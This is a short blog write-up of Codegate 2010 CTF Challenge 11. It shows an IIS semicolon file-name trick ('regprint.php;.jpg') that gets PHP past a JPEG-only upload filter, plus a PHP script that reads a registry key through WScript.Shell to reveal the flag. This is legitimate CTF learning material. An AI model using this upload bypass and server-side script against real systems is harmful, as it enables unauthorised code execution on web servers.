You are here: Home / Blog / Archives for IIS

Codegate 2010 Challenge 11 writeup

March 18, 2010 by Hiếu Lê · 7 Comments 

Summary

http://ctf6.codegate.org/31337_/index.html

Get a value of HKLM\Software\codegate2010, it’s the flag.

Analysis

At first when accessing the url, it shows up a page allow you to upload a jpeg image and only .jpg files. As I noticed, it serves by IIS. Suddenly, I remember of the vulnerability of IIS in processing image files. A little bit google show me the result. Ah ha, let’s test it by uploading a php file likes “test.php;.jpg”. Incredible!

Now, the only thing we have to do is writing some lines of php to read the REG key.

regprint.php;.jpg
<?
$shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host");
$devenvpath=$shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\codegate2010");
echo $devenvpath
?>

Then, execute it by  http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg

LollerSkaterz_From_RoflCopters_With_Guinness

Easy game with 1200 point.

Vulnerability

In facts, after the game thaidn said that it’s a fault of deploying the challenge, it’s designed to be passed by a 0-day of core php.

References

Share and Enjoy:
  • Digg
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Add to favorites
  • Reddit
  • Technorati
  • Tumblr
  • Twitter
  • Slashdot
  • Identi.ca

Filed under Capture The Flag, Web Security · Tagged with , , , , , ,